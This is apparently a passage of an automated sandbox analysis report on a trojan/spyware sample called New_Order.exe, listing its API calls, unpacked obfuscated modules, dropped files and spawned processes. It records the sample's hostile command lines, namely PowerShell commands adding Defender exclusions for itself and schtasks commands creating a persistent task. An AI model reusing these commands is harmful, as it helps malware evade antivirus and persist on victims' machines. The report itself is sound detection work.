            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2E30 NtWriteVirtualMemory,10_2_012C2E30
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2EA0 NtAdjustPrivilegesToken,10_2_012C2EA0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2E80 NtReadVirtualMemory,10_2_012C2E80
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C2EE0 NtQueueApcThread,10_2_012C2EE0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C3010 NtOpenDirectoryObject,10_2_012C3010
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C3090 NtSetValueKey,10_2_012C3090
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C39B0 NtGetContextThread,10_2_012C39B0
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C3D10 NtOpenProcessToken,10_2_012C3D10
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_012C3D70 NtOpenThread,10_2_012C3D70
            Source: C:\Windows\SysWOW64\wextract.exeProcess Stats: CPU usage > 49%
            Source: New_Order.exe, 00000000.00000002.1763065406.0000000008A0E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameJkC.exe> vs New_Order.exe
            Source: New_Order.exe, 00000000.00000002.1756730233.0000000004707000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs New_Order.exe
            Source: New_Order.exe, 00000000.00000002.1752800815.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs New_Order.exe
            Source: New_Order.exe, 00000000.00000002.1763665743.000000000E150000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs New_Order.exe
            Source: New_Order.exe, 0000000A.00000002.1848954122.0000000000E2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE D vs New_Order.exe
            Source: New_Order.exe, 0000000A.00000002.1854001997.000000000137D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs New_Order.exe
            Source: New_Order.exe, 0000000A.00000002.1848954122.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameWEXTRACT.EXE D vs New_Order.exe
            Source: New_Order.exeBinary or memory string: OriginalFilenameJkC.exe> vs New_Order.exe
            Source: New_Order.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: QjSljS.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: New_Order.exeReversingLabs: Detection: 67%
            Source: New_Order.exeVirustotal: Detection: 68%
            Source: C:\Users\user\Desktop\New_Order.exeFile read: C:\Users\user\Desktop\New_Order.exeJump to behavior
            Source: C:\Users\user\Desktop\New_Order.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: unknownProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exe
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New_Order.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpBC11.tmp
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exe
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exe
            Source: C:\Users\user\Desktop\New_Order.exeProcess created: C:\Users\user\Desktop\New_Order.exe C:\Users\user\Desktop\New_Order.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QjSljS" /XML "C:\Users\user\AppData\Local\Temp\tmpCEFD.tmp
            Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeProcess created: C:\Users\user\AppData\Roaming\QjSljS.exe C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exeProcess created: C:\Windows\SysWOW64\wextract.exe C:\Windows\SysWOW64\wextract.exe
            Source: C:\Program Files (x86)\PguDoaZJsfFLgmOhBUDuBYdPQBTjzoMwDyDCydphyRQPlASyww\MxIFbOJlQLdXkFqAx.exeProcess created: C:\Windows\SysWOW64\wextract.exe C:\Windows\SysWOW64\wextract.exe
            Source: C:\Windows\SysWOW64\wextract.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
            Source: C:\Users\user\Desktop\New_Order.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: C:\Users\user\Desktop\New_Order.exe File created: C:\Users\user\AppData\Roaming\QjSljS.exe
            Source: C:\Users\user\Desktop\New_Order.exe File created: C:\Users\user\AppData\Local\Temp\tmpBC11.tmp
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@32/16@12/9
            Source: C:\Users\user\Desktop\New_Order.exe File read: C:\Users\user\Desktop\desktop.ini
            Source: 11.2.QjSljS.exe.2495610.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.New_Order.exe.2b16bac.0.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.New_Order.exe.2b1abc4.1.raw.unpack, ReactionVessel.csSuspicious method names: .ReactionVessel.Inject
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, bqmxolvPvPxiKNnaj2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: _0020.SetAccessControl
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, bqmxolvPvPxiKNnaj2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, bqmxolvPvPxiKNnaj2.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: _0020.SetAccessControl
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, nAjuhA9HsaZwFfDopo.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
            Source: New_Order.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
            Source: C:\Users\user\Desktop\New_Order.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\QjSljS.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7708:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7616:120:WilError_03
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeMutant created: \Sessions\1\BaseNamedObjects\ZqnrGkOmbbnQafkKZLHEG
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8116:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7544:120:WilError_03
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\New_Order.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: C:\Windows\SysWOW64\wextract.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
            Source: New_Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: New_Order.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: New_Order.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: firefox.pdbP source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wextract.pdb source: New_Order.exe, 0000000A.00000002.1848954122.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4165809327.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, QjSljS.exe, 00000012.00000002.1907867203.0000000000F97000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000002.4165108580.0000000000688000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JkC.pdbSHA256 source: New_Order.exe, QjSljS.exe.0.dr
            Source: Binary string: wextract.pdbGCTL source: New_Order.exe, 0000000A.00000002.1848954122.0000000000DF7000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4165809327.0000000000EA8000.00000004.00000020.00020000.00000000.sdmp, QjSljS.exe, 00000012.00000002.1907867203.0000000000F97000.00000004.00000020.00020000.00000000.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000002.4165108580.0000000000688000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: JkC.pdb source: New_Order.exe, QjSljS.exe.0.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: MxIFbOJlQLdXkFqAx.exe, 0000000D.00000002.4165599306.0000000000CDE000.00000002.00000001.01000000.0000000D.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000014.00000000.1816147347.0000000000CDE000.00000002.00000001.01000000.0000000D.sdmp, MxIFbOJlQLdXkFqAx.exe, 00000017.00000002.4165740008.0000000000CDE000.00000002.00000001.01000000.0000000D.sdmp
            Source: Binary string: wntdll.pdbUGP source: New_Order.exe, 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.000000000524E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1845191923.0000000004D52000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1853417520.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.000000000497E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1908946698.0000000004638000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1906920518.000000000448A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: New_Order.exe, New_Order.exe, 0000000A.00000002.1854001997.0000000001250000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.000000000524E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1845191923.0000000004D52000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.1853417520.0000000004F07000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000002.4167101706.00000000050B0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.000000000497E000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1908946698.0000000004638000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000015.00000002.1910678293.00000000047E0000.00000040.00001000.00020000.00000000.sdmp, wextract.exe, 00000015.00000003.1906920518.000000000448A000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: firefox.pdb source: wextract.exe, 00000013.00000003.2041629441.0000000007E33000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 00000013.00000003.2092892717.0000000008493000.00000004.00000020.00020000.00000000.sdmp

            Data Obfuscation

            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, nAjuhA9HsaZwFfDopo.cs.Net Code: sCK2rvLeLm System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New_Order.exe.e150000.7.raw.unpack, nAjuhA9HsaZwFfDopo.cs.Net Code: sCK2rvLeLm System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New_Order.exe.5500000.4.raw.unpack, -Module-.cs.Net Code: _206C_206F_200B_202D_202C_200C_206B_206D_206B_200F_200C_200D_202E_200C_200F_202C_202C_202E_206D_202D_202C_202E_202B_206A_202A_206F_206D_202D_200B_200E_206B_200B_206E_200F_202A_206A_206E_200D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New_Order.exe.5500000.4.raw.unpack, QuickSort.cs.Net Code: _206B_200F_202C_202A_206B_202B_206A_202C_206C_200D_202C_200E_202D_200C_202C_206D_202C_202E_206B_200B_202B_206C_200F_206E_200E_206E_200F_206E_200B_202B_202D_206F_202D_200D_200C_200E_206E_202C_206D_202B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New_Order.exe.2af6120.2.raw.unpack, -Module-.cs.Net Code: _206C_206F_200B_202D_202C_200C_206B_206D_206B_200F_200C_200D_202E_200C_200F_202C_202C_202E_206D_202D_202C_202E_202B_206A_202A_206F_206D_202D_200B_200E_206B_200B_206E_200F_202A_206A_206E_200D_206E_206B_202E System.Reflection.Assembly.Load(byte[])
            Source: 0.2.New_Order.exe.2af6120.2.raw.unpack, QuickSort.cs.Net Code: _206B_200F_202C_202A_206B_202B_206A_202C_206C_200D_202C_200E_202D_200C_202C_206D_202C_202E_206B_200B_202B_206C_200F_206E_200E_206E_200F_206E_200B_202B_202D_206F_202D_200D_200C_200E_206E_202C_206D_202B_202E System.Reflection.Assembly.Load(byte[])
            Source: 11.2.QjSljS.exe.36e2220.3.raw.unpack, nAjuhA9HsaZwFfDopo.cs.Net Code: sCK2rvLeLm System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0DF0BA6D push FFFFFF8Bh; iretd 0_2_0DF0BA6F
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_004120E1 push esi; ret 10_2_004120E4
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00414206 push ds; ret 10_2_00414207
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_004182DC push ebp; iretd 10_2_004182E1
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00419B4A push es; iretd 10_2_00419B4B
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0041ABE4 push ds; retf 10_2_0041ABE6
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_004033F0 push eax; ret 10_2_004033F2
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0042B5C2 push eax; ret 10_2_0042B5C4
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00422D83 push cs; ret 10_2_00422E7C
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0041AD80 push edx; retf 10_2_0041AD81
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00413DAE push es; ret 10_2_00413DBA
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00419E15 push esi; retf 10_2_00419E31
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_0041AEC5 push edi; ret 10_2_0041AEC9
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_00404FFB push ss; retf 10_2_00404FFF
            Source: C:\Users\user\Desktop\New_Order.exeCode function: 10_2_004177B2 push edi; iretd 10_2_004177B3
            Source: C:\Users\user\Desktop\New_Order.exe Code function: 10_2_012809AD push ecx; mov dword ptr [esp], ecx 10_2_012809B6
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 11_2_022BB265 push FFFFFF8Bh; iretd 11_2_022BB267
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147C06D push edi; ret 18_2_0147C06F
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0140135E push eax; iretd 18_2_01401369
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147C54F push 8B014067h; ret 18_2_0147C554
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147C54D pushfd ; ret 18_2_0147C54E
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147C9D7 push edi; ret 18_2_0147C9D9
            Source: C:\Users\user\AppData\Roaming\QjSljS.exe Code function: 18_2_014309AD push ecx; mov dword ptr [esp], ecx 18_2_014309B6
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147BF38 push edi; ret 18_2_0147BF3A
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01401FEC push eax; iretd 18_2_01401FED
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_01480E7F push edi; ret 18_2_01480E81
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147BECE push edi; ret 18_2_0147BEE0
            Source: C:\Users\user\AppData\Roaming\QjSljS.exeCode function: 18_2_0147BEAD push edi; ret 18_2_0147BEAF
            Source: New_Order.exeStatic PE information: 0xA541C5EC [Fri Nov 9 17:05:48 2057 UTC]
            Source: initial sampleStatic PE information: section name: .text entropy: 7.880750053581327
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, DGgk8FJ1T9SQqJsR4v.csHigh entropy of concatenated method names: 'UJToeKKvdW', 'BidobkwfF9', 'HE2ocB9loE', 'rJ3otoiyIJ', 'lDUo12bNxK', 'cIZoBLICZT', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, bqmxolvPvPxiKNnaj2.csHigh entropy of concatenated method names: 'yPV81Xq4XY', 'N0y893QaIj', 'xt8851VtdI', 'L4p8022f60', 'oeD8MXmyV8', 'NDE8ODFEEY', 'sGR8VQtYLW', 'MYG8HWt0YJ', 'P5t8nW4cEC', 'P688s6qKaW'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, DLCQ6qWPZ2npD2VK97c.csHigh entropy of concatenated method names: 'treGy1qibf', 'ybyGipLFXf', 'FRXGrUuCHE', 'vJjGFdmBGe', 'rt2GTs4Svq', 'sxnGKddxxe', 'e2NG3HvVJV', 'yDOGdnnM7D', 'I5tGD4QLqR', 'W5hGNoiLW7'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, RsTPbKup2wq6YN65MQ.csHigh entropy of concatenated method names: 'OARYyxs9pg', 'gxhYi9vy10', 'RZUYrSRsHs', 'Gr2YFf1U75', 'qKBYT1vriX', 'VM9YK8sSkT', 'UvGY3x8yNV', 'VJIYd22uft', 'dJKYDOHfJM', 'SaxYNRkcHV'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, goEE1epI6dHkIrNF1v.csHigh entropy of concatenated method names: 'XTEuFmx9Gb', 'JFRuK63C7a', 'HI1udFDKVp', 'F9nuDf9049', 'CvouqmoXL7', 'OixuS82yXG', 'R4buIQkajT', 'oFTuoWowAT', 'f04uGGZ1vl', 'GhYuX2CwSK'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, oeaCEEWWlgoouEcLVPL.csHigh entropy of concatenated method names: 'ToString', 'nyWXRQDjhG', 'jmNX2aoZlN', 'd0SXJAjbJi', 'W93XwxKtpT', 'gZ8X8DaWW5', 'GToXu4hwH8', 'rq6XvqSN7t', 'ILg4krFXyPmSfIU5At6', 'uXdIpvFJ1AskUOf5PPn'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, JPthFlW7Vq61JKub2YN.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'P4BX1wbtLb', 'E1nX9T8Hmy', 'xpKX5b1Si2', 'vpXX0D8hq7', 'p93XMJhcac', 'zUNXOkAOp7', 'tqVXVVrLxa'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, nAjuhA9HsaZwFfDopo.csHigh entropy of concatenated method names: 'YDrRJRnu0B', 'X6IRwrbMju', 'u9ZR8MZ1Ml', 'LLcRupR7h1', 'he4RvtlTAJ', 't0lRpGrvc5', 'smiRYy0oob', 'upgRf5cVvv', 'UmxRhZpiVC', 'M6ZREG6lk6'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, kycsHry1MAvVD8x7AF.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'HF3lnuYxld', 'N28lsw2m82', 'xM5lzqVlEg', 'DlnR73njkh', 'oIwRaEZ37C', 'llPRlDA8mK', 'LtpRRjuH9D', 'ElSrrCsFPAokaWPooEy'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, BGayaGs6fsYETrsyVi.csHigh entropy of concatenated method names: 'futow8K3Ls', 'aqao8D1Hop', 'gblousriNU', 'vDrovws9PO', 'MSrop4uEJA', 'PJroYtnjRy', 'UYCofkXlpx', 'J31ohuGTBQ', 'CiSoEQOWWu', 'CO3o6Qs2PE'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, PpqMW0zQO4To1KIirG.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BgIGmiWxxW', 'nCHGqVU4qu', 'zC1GSdTMAO', 'flmGIaJtaM', 'IgvGo8kAwL', 'reDGGDp0ZO', 'xn5GXIMZFf'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, uCptQ5ciPt496xv8vt.csHigh entropy of concatenated method names: 'hXbmdjRLTZ', 'yLtmDl9cEE', 'gB2meKIsbO', 'HCImbjoe6h', 'XZomtcHPFX', 'ID0mB1dPVp', 'MyamUFE7Jt', 'vAxmCAcqip', 'aYlmPKnbgx', 'kQemkKFAkH'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, cjohpB6F4qCJl6on6W.csHigh entropy of concatenated method names: 'lA5pJS0LRu', 'hp1p8Nc1Y1', 'fsupvEAD5k', 'RBWpY7y6rk', 'zlxpfcA3CU', 'nfQvMGS2sX', 'BJ2vOsaSYN', 'yNJvVUXcUU', 'S90vHDT8jx', 'Sv9vnpBcqK'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, JVlQPXD8IYlAL4iUQc.csHigh entropy of concatenated method names: 'Dv4rraFNn', 'voPFbtwdW', 'UvVK9qeR6', 'pUj3cI0NO', 'D9kD5xJkY', 'O1JNps6W5', 'CO3ClfVCm0X4UvJSFV', 'B1lVClm1YRM0DhwkwZ', 'uqtowpqGY', 'd9cXWQAwm'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, oNamifxUxiguxbJyhK.csHigh entropy of concatenated method names: 'M7HYwJF8wf', 'CXeYu4WbND', 'Kt3YpiVxwE', 'biNpsudPdY', 'wQkpzerklC', 'xJcY7yTeWp', 'a8wYanoCau', 'owCYlubRUO', 'vasYRhg7RU', 'iJIY2vClc1'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, mrtCjLogu3Q1DWWwjP.csHigh entropy of concatenated method names: 'oJgIE74c2n', 'dPBI6bi5Kl', 'ToString', 'LSbIw7Ilmu', 'kOcI85YsXH', 'f1ZIujjvZ8', 'cb7IvIInwh', 'Y9IIpqIucv', 'D0BIY8N37O', 'xk7IfDZZuK'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, vSFpnK0N05eGXfNOef.csHigh entropy of concatenated method names: 'HX3pxMP5h8', 'PEXpyGFJvK', 'qg8prGTofX', 'eGIpFg4gDq', 'KVUpKtpNLJ', 'OoQp3oN4cK', 'APApDcmgNA', 'Sq7pNw0wTr', 'EfaqlWf56atJmatGjZ3', 'uClRYDfnAyy9x8GicqC'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, W9P0rCRK819M9K77jS.csHigh entropy of concatenated method names: 'Dispose', 'h5tanb8iRa', 'Naclbva9MO', 'kvs449HdxN', 'D29aslHuZN', 'G84azrVM1e', 'ProcessDialogKey', 'oRvl7OJx5o', 'KWBlaRcPNf', 'JDhllRbWCX'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, BeOUOrEKdOwVEsyIEg.csHigh entropy of concatenated method names: 'pPZIHgfWY1', 'j1LIsDDJKP', 'DEbo7qDIyL', 'MUGoaO3rcN', 'KuaIkEnrW0', 'Uu5ILUB6Ib', 'CmuIggg5Be', 'ydTI12Wknx', 'DQkI9YtWMT', 'XPJI5DwhHd'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, gHsRsfwrrRYNVGAThQ.csHigh entropy of concatenated method names: 'G5xGadhA9l', 'EGQGR8ZBAV', 'iHZG2Rjf7J', 'P3eGwwRrkN', 'qRUG8OpZH7', 'BFFGvNnmIQ', 'p5CGp9Gf0Z', 'Sx9oVG3SXw', 'm7KoHNDPR3', 'nZbon2AbM1'
            Source: 0.2.New_Order.exe.4726eb0.3.raw.unpack, WragX5NZaA88Oi9VWc.csHigh entropy of concatenated method names: 'Af0aY7nb5N', 'kvXafHCpZk', 'Yf5aEO4LIh', 'foYa69bYyr', 'LssaqW0eSE', 'sJJaSthxW4', 'RFGX6EHma6QWE0w37B', 'xWhoi4QRg1w5CD4DcA', 'WNeaaZ87kA', 'XpqaRYAnpp'
